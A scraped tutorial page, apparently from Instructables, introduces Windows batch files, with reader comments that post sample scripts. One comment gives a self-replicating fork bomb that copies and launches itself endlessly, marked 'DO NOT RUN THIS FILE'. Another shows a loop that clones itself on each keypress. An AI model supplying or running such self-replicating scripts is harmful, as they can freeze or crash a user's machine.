I will attach all .bat (batch) files needed in their appropriate
step.
Remove these ads by
Signing UpStep 1: Hello World!
Basically to start off with you should open notepad and type:
@echo offWhat this does is essentially block the command from showing while still showing the output.
Now with batch files there are various ways to "communicate".
For example:
@echo offecho hello worldmsg * hello worldnet send * hello worldGo ahead and write that into notepad and save it as com.bat. Then double click to start.
We will be using all of them except echo as it is pretty self-explanatory.
com.bat71 bytes


































Visit Our Store »
Go Pro Today »




@echo off
cls
:a
echo Clone Me. Push a key.
pause>nul
start Lolcloner.cmd
goto a
This batch program only clones itself when you push a key.
title Folder Creator
:menu
cls
echo Welcome!
echo -------------------------------------------------------------------------------------
echo.
echo 1) Create a new folder
echo 2) Exit
echo.
echo -------------------------------------------------------------------------------------
echo.
set/p nbr=Type the action number you want to do:
if %nbr%==1 GOTO new
if %nbr%==2 exit
:new
cls
echo New Folder
echo -------------------------------------------------------------------------------------
echo.
set/p nm=Folder Name:
md "%nm%"
if exist %nm% (
msg * "Folder successfully created!"
) else (
msg * "An error was found! '%nm%' was not created!"
)
GOTO menu
:: end
Save it as .bat
sorry, i had to get that out
-Blake Gambel
batch files are used to execute things they are used for logon scripts, simple tasks(renaming lots of files and stuf)
you should use .cmd they are more powerful then .bat .
Cmd is probably the best tool for learning, i think its great and love it
http://www.governmentsecurity.org/forum/index.php?showtopic=2020
_
@echo off
set num=1
::DO NOT RUN THIS FILE!!!
:start
set name=%num%%0
copy "%0" "%name%"
start %0
start %name%
set /a num=%num%+1
set name=%num%%0
If not exist %name% (
copy "%0" "%name%"
start %name%
GoTo start
) else (
goto start
http://www.instructables.com/id/How-to-terminate-a-fork-bomb/
:A
Cls
echo MESSENGER
set /p n=Ip Adress:
set /p m=Message:
net send %n% %m%
Pause
Goto A